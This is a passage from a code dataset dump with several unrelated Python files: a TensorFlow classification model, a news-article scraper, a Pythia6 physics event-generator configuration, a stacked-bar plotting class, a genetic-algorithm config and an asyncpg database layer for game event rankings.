mode=mode,\n activation=params['activation'], name=\"conv3\",\n kernel_regularizer=l2_regularizer)\n conv3 = tf.layers.batch_normalization(conv3)\n conv4 = cnn_1d(conv3, 3, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv4\",\n kernel_regularizer=l2_regularizer)\n conv4 = tf.layers.batch_normalization(conv4)\n conv5 = cnn_1d(conv4, 3, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv5\",\n kernel_regularizer=l2_regularizer)\n conv5 = tf.layers.batch_normalization(conv5)\n pool5 = max_pool_layer_1d(conv5, 3, \"pool2\", stride=2)\n # Output: 65x128 -> 32x128 = 4096\n fc6 = flatten_layer(pool5)\n fc6 = fc_layer(fc6, params['channels'][1] * 128, # 1024\n mode=mode,\n activation=params['activation'], kernel_regularizer=l2_regularizer,\n name='fc6', )\n dropout6 = tf.keras.layers.Dropout(rate=params['dropout_rate'])(fc6)\n # Output: 4096 -> 4096 -> 3\n fc7 = fc_layer(dropout6, params['channels'][1] * 64, # 1024\n mode=mode,\n activation=params['activation'], name='fc7',\n kernel_regularizer=l2_regularizer)\n dropout7 = tf.keras.layers.Dropout(rate=params['dropout_rate'])(fc7)\n logits = fc_layer(dropout7, 3,\n mode=mode,\n activation=None, name='predict', kernel_regularizer=l2_regularizer)\n return logits\n\n\ndef model_deep_sleep_net(features, mode, params, config):\n # print(features)\n require_channel = 2\n params['dropout_rate'] = 0.3\n assert len(params['channels']) == require_channel, \\\n \"This model need {} channels input, current input: {}\".format(require_channel, params['channels'])\n lstm_unit = 128\n init = tf.initializers.truncated_normal(stddev=0.1)\n regularizer = tf.nn.l2_loss\n conv1 = cnn_1d(features['image'], 5, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'],\n name=\"conv1\",\n input_shape=(300, 8),\n kernel_regularizer=l2_regularizer)\n conv2 = cnn_1d(conv1, 5, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'], name=\"conv2\",\n kernel_regularizer=l2_regularizer)\n conv3 = cnn_1d(conv2, 5, params['channels'][0] * 16,\n mode=mode,\n activation=params['activation'], name=\"conv3\",\n kernel_regularizer=l2_regularizer)\n pool3 = max_pool_layer_1d(conv3, 2, name=\"pool3\", stride=-1)\n pool3 = tf.layers.batch_normalization(pool3)\n\n conv4 = cnn_1d(pool3, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv4\",\n kernel_regularizer=l2_regularizer)\n conv5 = cnn_1d(conv4, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv5\",\n kernel_regularizer=l2_regularizer)\n conv6 = cnn_1d(conv5, 5, params['channels'][0] * 32,\n mode=mode,\n activation=params['activation'], name=\"conv6\",\n kernel_regularizer=l2_regularizer)\n pool6 = max_pool_layer_1d(conv6, 2, name=\"pool6\", stride=-1)\n pool6 = tf.layers.batch_normalization(pool6)\n\n conv7 = cnn_1d(pool6, 5, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv7\",\n kernel_regularizer=l2_regularizer)\n conv8 = cnn_1d(conv7, 5, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv8\",\n kernel_regularizer=l2_regularizer)\n conv9 = cnn_1d(conv8, 5, params['channels'][0] * 64,\n mode=mode,\n activation=params['activation'], name=\"conv9\",\n kernel_regularizer=l2_regularizer)\n pool9 = max_pool_layer_1d(conv9, 2, name=\"pool6\", stride=-1)\n pool9 = tf.layers.batch_normalization(pool9)\n\n # LSTM network\n cell_1 = tf.keras.layers.LSTMCell(lstm_unit)\n cell_2 = tf.keras.layers.LSTMCell(lstm_unit)\n cell_3 = tf.keras.layers.LSTMCell(lstm_unit)\n multicell = tf.nn.rnn_cell.MultiRNNCell([cell_1, cell_2, cell_3])\n\n nn, state = tf.nn.dynamic_rnn(multicell, pool9, dtype=tf.float32)\n nn = tf.transpose(nn, [1, 0, 2])\n nn = tf.gather(nn, int(nn.get_shape()[0]) - 1)\n\n # Dense\n logits = fc_layer(nn, 3,\n mode=mode,\n activation=None, name='predict', kernel_regularizer=l2_regularizer)\n return logits\n\n\ndef softmax_focal_loss(labels_l, logits_l, gamma=2., alpha=4.):\n \"\"\"Focal loss for multi-classification\n https://www.dlology.com/blog/multi-class-classification-with-focal-loss-for-imbalanced-datasets/\n FL(p_t)=-alpha(1-p_t)^{gamma}ln(p_t)\n gradient is d(Fl)/d(p_t) not d(Fl)/d(x) as described in paper\n d(Fl)/d(p_t) * [p_t(1-p_t)] = d(Fl)/d(x)\n Focal Loss for Dense Object Detection\n https://arxiv.org/abs/1708.02002\n\n Arguments:\n labels_l {tensor} -- ground truth labels_l, shape of [batch_size, num_class] <- Integer of class\n logits_l {tensor} -- model's output, shape of [batch_size, num_class] <- Before softmax\n\n Keyword Arguments:\n gamma {float} -- (default: {2.0})\n alpha {float} -- (default: {4.0})\n\n Returns:\n [tensor] -- loss.\n \"\"\"\n\n gamma = float(gamma)\n\n epsilon = 1e-32\n labels_l = tf.one_hot(indices=tf.cast(labels_l, tf.int32), depth=3)\n logits_l = tf.cast(logits_l, tf.float32)\n\n logits_l = tf.nn.softmax(logits_l)\n logits_l = tf.add(logits_l, epsilon) # Add epsilon so log is valid\n ce = tf.multiply(labels_l, -tf.log(logits_l)) # Cross entropy, shape of [batch_size, num_class]\n fl_weight = tf.multiply(labels_l, tf.pow(tf.subtract(1., logits_l), gamma)) # This is focal loss part\n fl = tf.multiply(alpha, tf.multiply(fl_weight, ce)) # Add alpha weight here\n reduced_fl = tf.reduce_max(fl, axis=1)\n return tf.reduce_mean(reduced_fl)\n\n\ndef get_loss_weight(labels): # Calculate loss weight of a single batch\n score_one = tf.reduce_sum(tf.cast(tf.equal(labels, tf.constant(0, dtype=tf.int64)), dtype=tf.float32))\n score_three = tf.reduce_sum(tf.cast(tf.equal(labels, tf.constant(1, dtype=tf.int64)), dtype=tf.float32))\n score_five = tf.reduce_sum(tf.cast(tf.equal(labels, tf.constant(2, dtype=tf.int64)), dtype=tf.float32))\n sum_total = score_one + score_three + score_five\n # Add 1 to all denominator to prevent overflow\n weight = tf.stack(\n [tf.math.divide(sum_total, score_one + 1), tf.math.divide(sum_total, score_three + 1),\n tf.math.divide(sum_total, score_five + 1)],\n axis=0)\n return tf.expand_dims(weight, axis=0)\n\n\ndef custom_l2_reg(loss, lambda_=0.01):\n # Reference: https://stackoverflow.com/questions/55029716/how-to-regularize-loss-function\n ys = tf.reduce_mean(loss)\n l2_norms = [tf.nn.l2_loss(v) for v in tf.compat.v1.trainable_variables()]\n l2_norm = tf.reduce_sum(l2_norms)\n loss = ys + lambda_ * l2_norm\n return loss, lambda_ * l2_norm\n\n\n# Define Model\ndef my_model(features, labels, mode, params, config):\n # features['image'] = features['image']*100 # Since the difference is too small\n params['activation'] = tf.nn.leaky_relu\n # Input: (Batch_size,300,8)\n logits = model_cnn_1d(features, mode, params, config)\n # Predict Mode\n predicted_class = tf.argmax(logits, 1)\n if mode == tf.estimator.ModeKeys.PREDICT:\n predictions = {\n 'score': predicted_class[:, tf.newaxis],\n 'probabilities': tf.nn.softmax(logits),\n 'logits': logits\n }\n return tf.estimator.EstimatorSpec(mode=mode, predictions=predictions)\n labels = (labels - 1) / 2 # Convert score from 1,3,5 to 0,1,2\n one_hot_label = tf.one_hot(indices=tf.cast(labels, tf.int32), depth=3)\n labels = tf.cast(labels, tf.int64)\n\n # Create loss weight to help imbalance dataset between each class\n # clamp_val = 5 # Max loss weight cannot be more than 5 times of min value\n # if max(params['loss_weight']) / min(params['loss_weight']) > clamp_val:\n # params['loss_weight'][params['loss_weight'].index(max(params['loss_weight']))] = clamp_val * min(\n # params['loss_weight'])\n # weight = tf.constant([[params['loss_weight'][0], params['loss_weight'][1], params['loss_weight'][2]]],\n # dtype=tf.float32)\n\n # Use loss weight based on each batch\n if mode == tf.estimator.ModeKeys.TRAIN:\n loss_weight_raw = get_loss_weight(labels)\n loss_weight = tf.matmul(one_hot_label, loss_weight_raw, transpose_b=True, a_is_sparse=True)\n else:\n loss_weight = 1.0\n # Cross-entropy loss\n loss = tf.compat.v1.losses.sparse_softmax_cross_entropy(labels, logits,\n weights=loss_weight) # labels is int of class, logits is vector\n loss, reg_loss = custom_l2_reg(loss, lambda_=0.01)\n\n # Focal loss\n # loss = softmax_focal_loss(labels, logits, gamma=0., alpha=loss_weight)\n\n accuracy = tf.compat.v1.metrics.accuracy(labels, predicted_class)\n num_classes = 3\n pos_indices = [0, 1, 2]\n average = 'macro'\n precision = tf_metrics.precision(\n labels, predicted_class, num_classes, pos_indices, average=average)\n recall = tf_metrics.recall(\n labels, predicted_class, num_classes, pos_indices, average=average)\n accuracy = tf_metrics.precision(\n labels, predicted_class, num_classes, pos_indices, average=\"micro\")\n my_accuracy = tf.reduce_mean(tf.cast(tf.equal(labels, predicted_class), dtype=tf.float32))\n acc = tf.compat.v1.summary.scalar(\"accuracy_manual\", my_accuracy) # Number of correct answer\n\n # Create parameters to show in Tensorboard\n tf.compat.v1.summary.scalar(\"Prediction Output\", predicted_class[0])\n tf.compat.v1.summary.scalar(\"Mean Ground Truth\", tf.reduce_mean(tf.cast(labels, tf.float32)))\n d_vars = tf.compat.v1.get_collection(tf.compat.v1.GraphKeys.TRAINABLE_VARIABLES)\n # print(\"d_vars\", d_vars)\n # global_step = tf.summary.scalar(\"Global steps\",tf.train.get_global_step())\n\n trainable_variable_name = [v.name for v in tf.compat.v1.trainable_variables()]\n\n # tf.summary for all weight and bias\n summary_weight = []\n for i, t in enumerate(trainable_variable_name):\n summary_weight.append(tf.compat.v1.summary.histogram(t, tf.compat.v1.trainable_variables()[i]))\n current_step = tf.compat.v1.train.get_global_step()\n\n # Train Mode\n if mode == tf.estimator.ModeKeys.TRAIN:\n learning_rate = tf.compat.v1.train.exponential_decay(params['learning_rate'], current_step,\n 20000, 0.96, staircase=True)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n loss_gradient = [optimizer.compute_gradients(loss, tf.trainable_variables()[\n trainable_variable_name.index('dense_1/kernel:0')]),\n optimizer.compute_gradients(loss, tf.trainable_variables()[\n trainable_variable_name.index('conv1/kernel:0')])]\n train_op = optimizer.minimize(loss, global_step=current_step)\n\n save_steps = 1000\n saver_hook = tf.compat.v1.train.SummarySaverHook(save_steps=save_steps, summary_op=tf.compat.v1.summary.merge_all(),\n output_dir=config.model_dir)\n print_input_hook = PrintValueHook(features['image'], \"Input value\", current_step, save_steps)\n print_input_name_hook = PrintValueHook(features['name'], \"Input name\", current_step, save_steps)\n print_logits_hook = PrintValueHook(tf.nn.softmax(logits), \"Training logits\", current_step,\n save_steps)\n print_label_hook = PrintValueHook(labels, \"Labels\", current_step, save_steps)\n print_lr_hook = PrintValueHook(learning_rate, \"Learning rate\", current_step, save_steps)\n print_loss_hook = PrintValueHook(loss, \"Total Loss\", current_step, save_steps)\n print_reg_loss_hook = PrintValueHook(reg_loss, \"Regularization Loss\", current_step, save_steps)\n\n print_weight_balance_hook = PrintValueHook(loss_weight_raw, \"Loss weight\", current_step,\n save_steps)\n print_lg_hook = PrintValueHook(loss_gradient[0][0][0][0, 0:16], \"FC6 Loss gradient\", current_step,\n save_steps)\n print_lg2_hook = PrintValueHook(loss_gradient[0][0][1][0, 0:16], \"FC6 Variable\", current_step,\n save_steps)\n print_lg3_hook = PrintValueHook(loss_gradient[1][0][0][0, 0, :], \"Conv1 Loss gradient\",\n current_step,\n save_steps)\n print_lg4_hook = PrintValueHook(loss_gradient[1][0][1][0, 0, :], \"Conv1 Variable\", current_step,\n save_steps)\n # Setting logging parameters\n train_hooks = [print_input_hook, print_input_name_hook,\n saver_hook, print_logits_hook, print_label_hook,\n print_lr_hook,\n print_loss_hook, print_reg_loss_hook,\n print_weight_balance_hook,\n # print_lg_hook, print_lg2_hook,\n # print_lg3_hook, print_lg4_hook,\n ]\n\n return tf.estimator.EstimatorSpec(mode=mode, loss=loss, train_op=train_op,\n training_hooks=train_hooks)\n\n # Evaluate Mode\n print(\"Evaluation Mode\")\n eval_save_steps = 10\n # Create result(.csv) file, if not exist\n # If change any header here, don't forget to change data in EvalResultHook (custom_hook.py)\n if not os.path.isfile(params['result_path']):\n with open(os.path.join(params['result_path'], params['result_file_name']), \"w\") as csvfile:\n fieldnames = ['Name', 'Label', 'Predicted Class', 'Confident level', 'All confident level']\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames)\n writer.writeheader()\n\n # Create hooks\n if params['result_file_name'] == 'train_result.csv':\n saver_hook = tf.train.SummarySaverHook(save_steps=eval_save_steps, summary_op=tf.summary.merge_all(),\n output_dir=os.path.join(config.model_dir, 'train_final'))\n else:\n saver_hook = tf.train.SummarySaverHook(save_steps=eval_save_steps, summary_op=tf.summary.merge_all(),\n output_dir=os.path.join(config.model_dir, 'eval'))\n tensorboard_hook = tf.train.SummarySaverHook(save_steps=eval_save_steps, summary_op=tf.summary.merge_all(),\n output_dir=config.model_dir)\n csv_name = tf.convert_to_tensor(os.path.join(params['result_path'], params['result_file_name']), dtype=tf.string)\n print_result_hook = EvalResultHook(features['name'], labels, predicted_class, tf.nn.softmax(logits), csv_name)\n print_logits_hook = PrintValueHook(tf.nn.softmax(logits), \"Validation Training logits\", current_step,\n 0)\n print_label_hook = PrintValueHook(labels, \"Validation Labels\", current_step, 0)\n\n eval_hooks = [saver_hook, tensorboard_hook, print_result_hook,\n # print_logits_hook, print_label_hook,\n ]\n metrics = {\n 'accuracy': accuracy,\n 'precision': precision, 'recall': recall,\n }\n for metric_name, metric in metrics.items():\n tf.summary.scalar(metric_name, metric[1])\n\n return tf.estimator.EstimatorSpec(mode=mode, eval_metric_ops=metrics,\n loss=loss, evaluation_hooks=eval_hooks)\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":21693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"305363321","text":"import newspaper\nfrom datetime import datetime\nfrom datetime import timedelta\nfrom typing import List\nfrom pprint import pprint\nfrom newspaper import news_pool\nfrom config import SITE_URLS\nfrom config import DEBUG\nfrom config import THREADS_PER_SOURCE\n\n\ndef get_articles(paper: newspaper.source.Source) -> List[List[str]]:\n\n print(paper.url, 'total articles:', paper.size())\n\n articles = []\n\n for article in paper.articles:\n\n article.parse()\n\n # Filter articles published in the last two days\n if (article.publish_date and\n article.publish_date.replace(tzinfo=None) >\n (datetime.today() - timedelta(days=2))):\n\n article_data = [\n article.title,\n article.publish_date.strftime('%m/%d/%Y %H:%M'),\n ', '.join(article.authors),\n article.text,\n article.url\n ]\n\n if DEBUG:\n print('Adding article:')\n pprint(article_data)\n\n articles.append(article_data)\n\n return articles\n\n\ndef main() -> List[List[str]]:\n papers = [newspaper.build(url,\n memoize_articles=False,\n fetch_images=False,\n verbose=DEBUG)\n for url in SITE_URLS]\n news_pool.set(papers, threads_per_source=THREADS_PER_SOURCE)\n news_pool.join()\n\n articles = []\n\n for paper in papers:\n articles.extend(get_articles(paper))\n\n print('Final number of articles:', len(articles))\n\n return articles\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"534993262","text":"import FWCore.ParameterSet.Config as cms\n\ngenerator = cms.EDFilter(\"Pythia6GeneratorFilter\",\n pythiaPylistVerbosity = cms.untracked.int32(0),\n filterEfficiency = cms.untracked.double(1.0),\n pythiaHepMCVerbosity = cms.untracked.bool(False),\n comEnergy = cms.double(8000.0),\n maxEventsToPrint = cms.untracked.int32(0),\n PythiaParameters = cms.PSet(\n pythiaUESettings = cms.vstring(\n 'MSTJ(11)=3 ! Choice of the fragmentation function', \n 'MSTJ(22)=2 ! Decay those unstable particles', \n 'PARJ(71)=10 . ! for which ctau 10 mm', \n 'MSTP(2)=1 ! which order running alphaS', \n 'MSTP(33)=0 ! no K factors in hard cross sections', \n 'MSTP(51)=10042 ! structure function chosen (external PDF CTEQ6L1)', \n 'MSTP(52)=2 ! work with LHAPDF', \n 'MSTP(81)=1 ! multiple parton interactions 1 is Pythia default', \n 'MSTP(82)=4 ! Defines the multi-parton model', \n 'MSTU(21)=1 ! Check on possible errors during program execution', \n 'PARP(82)=1.8387 ! pt cutoff for multiparton interactions', \n 'PARP(89)=1960. ! sqrts for which PARP82 is set', \n 'PARP(83)=0.5 ! Multiple interactions: matter distrbn parameter', \n 'PARP(84)=0.4 ! Multiple interactions: matter distribution parameter', \n 'PARP(90)=0.16 ! Multiple interactions: rescaling power', \n 'PARP(67)=2.5 ! amount of initial-state radiation', \n 'PARP(85)=1.0 ! gluon prod. mechanism in MI', \n 'PARP(86)=1.0 ! gluon prod. mechanism in MI', \n 'PARP(62)=1.25 ! ', \n 'PARP(64)=0.2 ! ', \n 'MSTP(91)=1 !', \n 'PARP(91)=2.1 ! kt distribution', \n 'PARP(93)=15.0 ! '),\n processParameters = cms.vstring(\n 'MSEL = 0 ! User defined processes', \n 'MSUB(81) = 1 ! qqbar to QQbar', \n 'MSUB(82) = 1 ! gg to QQbar', \n 'MSTP(7) = 6 ! flavour = top', \n 'PMAS(6,1) = 172.5 ! top quark mass', \n 'MWID(37)=2', \n 'PMAS(37,1) = 120 ! charged Higgs mass ', \n 'MDME(41,1) = 0 ! t decay into g t', \n 'MDME(42,1) = 0 ! t decay into gamma t', \n 'MDME(43,1) = 0 ! t decay into Z0 t', \n 'MDME(44,1) = 0 ! t decay into W d', \n 'MDME(45,1) = 0 ! t decay into W s', \n 'MDME(46,1) = 3 ! t decay into W and b ', \n 'MDME(47,1) = 0 ! t decay into W b` ', \n 'MDME(48,1) = 0 ! t decay into h0 t', \n 'MDME(49,1) = 2 ! t decay into H and b ', \n 'MDME(50,1) = 0 ! t decay into ~chi_10 ~t_1', \n 'MDME(51,1) = 0 ! t decay into ~chi_20 ~t_1', \n 'MDME(52,1) = 0 ! t decay into ~chi_30 ~t_1', \n 'MDME(53,1) = 0 ! t decay into ~chi_40 ~t_1', \n 'MDME(54,1) = 0 ! t decay into ~g ~t_1', \n 'MDME(55,1) = 0 ! t decay into ~Gravitino ~t_1',\n # Switch off / on desirable channels for W-\n 'MDME(190,1) = 0',\n 'MDME(191,1) = 0',\n 'MDME(192,1) = 0',\n 'MDME(193,1) = 0',\n 'MDME(194,1) = 0',\n 'MDME(195,1) = 0',\n 'MDME(196,1) = 0',\n 'MDME(197,1) = 0',\n 'MDME(198,1) = 0',\n 'MDME(199,1) = 0',\n 'MDME(200,1) = 0',\n 'MDME(206,1) = 1 ! W decay into e nu',\n 'MDME(207,1) = 1 ! W decay into mu nu',\n 'MDME(208,1) = 0'),\n parameterSets = cms.vstring('pythiaUESettings', \n 'processParameters', \n 'PYUPDAParameters'),\n PYUPDAParameters = cms.vstring(\"PYUPDAFILE = \\'Configuration/Generator/data/Pythia_H+120_cbbar_pyupda.in\\' \")\n )\n)\n","sub_path":"genfragments/EightTeV/TTbar_HBWB_M-120_pythia6_cff.py","file_name":"TTbar_HBWB_M-120_pythia6_cff.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"560284084","text":"import pylab\nfrom matplotlib import pylab\nfrom .PlotInfo import *\nfrom .Bar import *\nimport sys\n\n\nclass StackedBars(PlotInfo):\n \"\"\"\n A stacked bar chart consisting of multiple series of bars with the \n same X axis values\n \"\"\"\n\n def __init__(self):\n PlotInfo.__init__(self, \"stacked bar\")\n\n self.bars = []\n self.spacing = 0\n self.width = 0.8\n\n def add(self, bar):\n if not isinstance(bar, Bar):\n print >>sys.stderr, \"Can only add Bars to a StackedBars\"\n sys.exit(1)\n\n self.bars.append(bar)\n\n def getXLabelLocations(self):\n if len(self.bars) == 0:\n return []\n else:\n numBarVals = len(self.bars[0].xValues)\n return [i + self.width / 2.0 for i in xrange(numBarVals)]\n\n def draw(self, axis):\n self.xTickLabelPoints = self.getXLabelLocations()\n\n PlotInfo.draw(self, axis)\n\n plotHandles = []\n plotLabels = []\n\n if len(self.bars) == 0:\n return [plotHandles, plotLabels]\n\n numBars = len(self.bars)\n\n bottoms = [0 for i in range(len(self.xTickLabelPoints))]\n\n xVals = [i + i * self.spacing \\\n for i in range(len(self.bars[0].xValues))]\n\n for bar in self.bars:\n attrs = bar.getAttributes()\n currHandle = axis.bar(xVals, bar.yValues, bottom=bottoms, **attrs)\n\n bottoms = [bar.yValues[i] + bottoms[i] \\\n for i in range(len(self.xTickLabelPoints))]\n\n plotHandles.append(currHandle[0])\n plotLabels.append(bar.label)\n return [plotHandles, plotLabels]\n","sub_path":"sofastats/boomslang/StackedBars.py","file_name":"StackedBars.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"176611354","text":"from os import getenv\nfrom math import floor\n\n# Genetic Algorithm params\n\nDEFAULT_CXPB_MUTPB = (0.2, 0.8, False) # (crossover rate, mutation rate, VAR_AND / VAR_OR)\n\nSELECTION_METHOD = 'rank' # ['tournament', 'rank']\nRANK_SELECTION_PRESSURE = 1.7 # Range: [1.1, 2.0]\nTOURNAMENT_SIZE = 2\n\nCROSSOVER_COOLING_RATE = 1.0\nMUTATION_COOLING_RATE = 1.0\n\n# Island Model\n\nNUM_ISLANDS = int(getenv('SPE_NUM_ISLANDS', 3))\nTOTAL_GENERATIONS = 50000\nMIGRATION_INTERVAL = 50\nISLAND_POPULATION = 200\nMIGRATION_RATIO = 0.1\nISLAND_ELITE_SIZE = floor(ISLAND_POPULATION * 0.05)\nLAMBDA = floor(ISLAND_POPULATION / 0.8) # denominator must be 1 or smaller\nMIGRATION_SCHEME = 'round_robin' # ['fixed', 'round_robin']\n\n# Logging\nLOGGER_ENVIRONMENT = 'local' # ['aws', 'azure', 'local']\nHALL_OF_FAME_HYPOTHESES = 1\nHALL_OF_FAME_DEBUG_INTERVAL = 50\nDUMP_ALL_POPULATION_EVERY_N_GENERATIONS = float(\"inf\")\nPROCESS_NAME_PREFIX = 'island'\nLOG_NAME_PREFIX = 'genetic_log'\nLOG_DEBUG_NAME_PREFIX = 'genetic_log_debug'\nUPLOAD_ISLAND_RECORD_TO_S3_EVERY_N_GENERATIONS = 100\nUPLOAD_LOG_TO_S3_EVERY_N_LINES = 1000\n\n# Incest prevention\n\nPREVENT_INCEST = False\nINCEST_THRESHOLD = 300\n\n# Crossover\n\nCROSSOVER_BOTH_HMM_AND_RULES = False\nCROSSOVER_HMM_WEIGHT = 1 # Weights for HMM/Rules crossover (in case CROSSOVER_BOTH_HMM_AND_RULES is False)\nCROSSOVER_RULES_WEIGHT = 1\n\n# Mutation\n\nMUTATE_BOTH_HMM_AND_RULES = False\nMAX_MUTATIONS = 1\nRANDOM_HYPOTHESIS_BY_MUTATIONS = False\nRANDOM_INIT_WARMUP_STEPS = 10000\nACCEPT_WORSE_PROBAB = 0.2\nUNPARSABLE_WORD_PENALTY = 1000\nUNPARSABLE_HYPOTHESIS_DISTANCE = 1000000\n\n# Rule set\n\nRULE_SET_CROSSOVER = 'uniform' # ['uniform', 'pivot']\n\n# HMM\n\nHMM_CROSSOVER_FUNCTION = 'emissions' # ['emissions', 'matrix', 'subgraph', 'connected_component']\nLIMIT_CROSSOVER_RESULT_NUM_OF_STATES = True\nMAX_CROSSOVERS = 1\nRANDOM_HMM_MAX_EMISSION_LENGTH = 5\nRANDOM_HMM_MAX_EMISSIONS_PER_STATE = 10\nRANDOM_HMM_METHOD = 'simple' # ['simple', 'matrix']\nHMM_RANDOM_EMISSIONS_BY_DATA = False # HMM random emissions will be substrings of data words\nDEFAULT_HMM_BY_RANDOM_PROBAB = 0.0\nEXPLICIT_HMM_BY_RANDOM_PROBAB = 0.0\nTRANSITION_MATRIX_TRANSITION_PROBABILITY = 0.1\n\n# Custom Genetic Algorithm params\n\nCUSTOM_CXPB_MUTPB_VALUES_PER_ISLAND = [] # Add tuples in form (CXPB, MUTPB, VAR_AND/VAR_OR) to set custom config per island\nCUSTOM_CONFIG_PER_ISLAND = {} # Set simulation configuration fields for specific islands. E.g. for island 64: {64: { \"MUTATE_RULE_SET\": 10, \"MUTATE_HMM\": 1 }}\n\n# Misc\n\nPARSER_TYPE = 'openfst' # ['python', 'openfst']\nLIMIT_TRANSDUCER_NUM_OF_STATES = 1000 # grammar transducers with too many states will return energy 'inf'\nCACHE_TYPE = 'none' # ['redis', 'mem', 'none']\nCACHE_RULE_SET_TRANSDUCERS = False\nCLEAR_RULE_SET_CACHE_INTERVAL = 100\n","sub_path":"source/ga_config.py","file_name":"ga_config.py","file_ext":"py","file_size_in_byte":2754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"155482901","text":"import os\nfrom datetime import datetime\nimport json\nfrom collections import namedtuple\n\nimport asyncpg\n\n\nevent_status_t = namedtuple(\n \"event_status_t\", (\"start_time\", \"end_time\", \"results_time\", \"last_collect_time\", \"have_final\")\n)\n\n\nclass DatabaseConnection(object):\n def __init__(self):\n self.connection_url = os.environ.get(\"AS_POSTGRES_DSN\")\n self.pool = None\n\n async def init_models(self):\n self.pool = await asyncpg.create_pool(dsn=self.connection_url)\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"\"\"\n DO $$ BEGIN\n CREATE TYPE tier_type_t AS ENUM ('points', 'voltage');\n EXCEPTION\n WHEN duplicate_object THEN null;\n END $$;\n \n CREATE TABLE IF NOT EXISTS event_v2 (\n serverid varchar(8),\n event_id int,\n event_title text,\n banner text,\n event_type text,\n start_t timestamp,\n end_t timestamp,\n result_t timestamp,\n\n UNIQUE(serverid, event_id)\n );\n CREATE TABLE IF NOT EXISTS event_story_v2 (\n serverid varchar(8),\n event_id int,\n chapter int,\n req_points int,\n banner text,\n title text,\n script_path text,\n\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n CREATE TABLE IF NOT EXISTS border_fixed_data_v3 (\n serverid varchar(8),\n event_id int,\n observation timestamp,\n is_last boolean,\n\n tier_type tier_type_t,\n points_t1 int, userid_t1 int,\n points_t2 int, userid_t2 int,\n points_t3 int, userid_t3 int,\n points_t4 int, userid_t4 int,\n points_t5 int, userid_t5 int,\n points_t6 int, userid_t6 int,\n points_t7 int, userid_t7 int,\n points_t8 int, userid_t8 int,\n points_t9 int, userid_t9 int,\n points_t10 int, userid_t10 int,\n\n UNIQUE (serverid, event_id, tier_type, observation),\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n CREATE TABLE IF NOT EXISTS border_data_v3 (\n serverid varchar(8),\n event_id int,\n observation timestamp,\n is_last boolean,\n\n tier_type tier_type_t,\n points int,\n tier_from int,\n tier_to int,\n\n UNIQUE(serverid, event_id, tier_type, tier_to, observation),\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n CREATE TABLE IF NOT EXISTS border_t100_v1 (\n serverid varchar(8),\n event_id int,\n tier_type tier_type_t,\n\n rank int,\n points int,\n user_id int,\n user_name text,\n user_level int,\n center_card int,\n center_level int,\n awakened boolean,\n full_tree boolean,\n wield_title int,\n\n UNIQUE(serverid, event_id, tier_type, rank),\n FOREIGN KEY (serverid, event_id) REFERENCES event_v2(serverid, event_id)\n ON UPDATE CASCADE ON DELETE CASCADE\n );\n \"\"\"\n )\n\n async def have_event_info(self, region, event_id):\n async with self.pool.acquire() as c:\n row = await c.fetchrow(\n \"\"\"SELECT COUNT(0) FROM event_v2 WHERE serverid=$1 AND event_id=$2\"\"\",\n region,\n event_id,\n )\n if row[0]:\n return True\n return False\n\n async def have_final_tiers(self, region, event_id):\n async with self.pool.acquire() as c:\n row = await c.fetchrow(\n \"\"\"SELECT is_last FROM border_data_v3 WHERE serverid=$1 AND event_id=$2 AND is_last=TRUE\"\"\",\n region,\n event_id,\n )\n if row:\n return True\n return False\n\n async def get_event_timing(self, region, event_id):\n async with self.pool.acquire() as c:\n row = await c.fetchrow(\n \"\"\"SELECT end_t, result_t FROM event_v2 WHERE serverid=$1 AND event_id=$2\"\"\",\n region,\n event_id,\n )\n\n if not row:\n return None, None\n return row[0], row[1]\n\n async def get_event_status(self, region, event_id):\n async with self.pool.acquire() as c:\n desc = await c.fetchrow(\n \"\"\"\n SELECT start_t, end_t, result_t FROM event_v2 WHERE serverid=$1 AND event_id=$2\n LIMIT 1\n \"\"\",\n region,\n event_id,\n )\n\n if not desc:\n return None\n\n obs, fin = None, False\n last_collect = await c.fetchrow(\n \"\"\"\n SELECT observation, is_last FROM border_data_v3 WHERE serverid=$1 AND event_id=$2 \n ORDER BY observation DESC LIMIT 1\n \"\"\",\n region,\n event_id,\n )\n\n if last_collect:\n obs = last_collect[\"observation\"]\n fin = last_collect[\"is_last\"]\n\n return event_status_t(desc[\"start_t\"], desc[\"end_t\"], desc[\"result_t\"], obs, fin)\n\n async def add_event(\n self, region, event_id, event_title, banner, event_type, start, end, results, stories\n ):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\n \"\"\"\n INSERT INTO event_v2 VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n \"\"\",\n region,\n event_id,\n event_title,\n banner,\n event_type,\n datetime.utcfromtimestamp(start),\n datetime.utcfromtimestamp(end),\n datetime.utcfromtimestamp(results),\n )\n\n await c.executemany(\n \"\"\"\n INSERT INTO event_story_v2 VALUES ($1, $2, $3, $4, $5, 